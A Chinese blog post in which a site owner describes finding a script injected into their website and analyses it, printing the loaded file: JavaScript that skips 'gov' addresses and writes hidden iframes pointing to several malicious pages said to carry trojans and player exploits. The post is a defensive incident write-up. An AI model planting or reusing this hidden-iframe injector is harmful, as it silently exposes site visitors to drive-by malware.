海外邮件中继，海外退信中继，美国高速VPS，不限流量VPN，邮局维护和管理，邮件网关，EMOS邮件中继，POSTFIX邮件中继，Winwebmail邮件中继,Winmail邮件中继,DBMail邮件中继,JDMail邮件中继,Exchange邮件中继,MDaemon邮件中继 淘宝店：http://shantan.taobao.com 云邮科技官网：www.yunrelay.com

【字体设置：大 中 小】
昨天晚上11点的时候，网站的访问都很正常，到了快12点的时候，我再次访问我的网站，瑞星马上就提示病毒


按照经验，马上查看了一下网站的源代码。
发现多了一下JAVA代码
<script src=http://23xzwwd1.count.xj.cn/images/images/1.css></script> 
这家伙很聪明，以为用CSS代替JS就没人发现了，于是我把文件下载下来，发现了以下的内容：
if(document.location.href.indexOf("gov")>=0)
{} else {
document.write("<div style='display:none'>")
document.write("<iframe src=http://thankyou1.count.xj.cn/images/images/mepeg.htm></iframe>")
document.write("<iframe src=http://niquanjia1fzl.count.xj.cn/images/images/tj.htm></iframe>")
document.write("<iframe src=http://quanj2ia.count.xj.cn/images/images/ff.htm></iframe>")
document.write("<iframe src=http://imso3rry.count.xj.cn/images/images/of.htm></iframe>")
document.write("<iframe src=http://goodebye.count.xj.cn/images/images/bf.htm></iframe>")
document.write("</div>")}
聪明的家伙，在检测网址的时候，还过滤了GOV的，毕竟GOV是官方的网站，随便挂马的话是被查的。
我用源码查看器去访问了那些页面，把代码都弄了下来了，有图片木马，有攻击统计网站的代码，还有攻击播放器的代码，NND,这杂种还真够狠的！

还好，现在已经处理好了。网页没有被修改，而是服务器出问题。

发表评论 - 不要忘了输入验证码哦！
作者：	用户：  密码：  我要注册 验证码：  为防止广告注册机程序,验证码不会自动显示,请点击此处显示或者(刷新)验证码!
评论： 禁止表情 禁止UBB 禁止图片 识别链接 识别关键字 确定发布？	最多可以输入200个字,目前你已经输入了0个字;你今日还可以发表10条评论!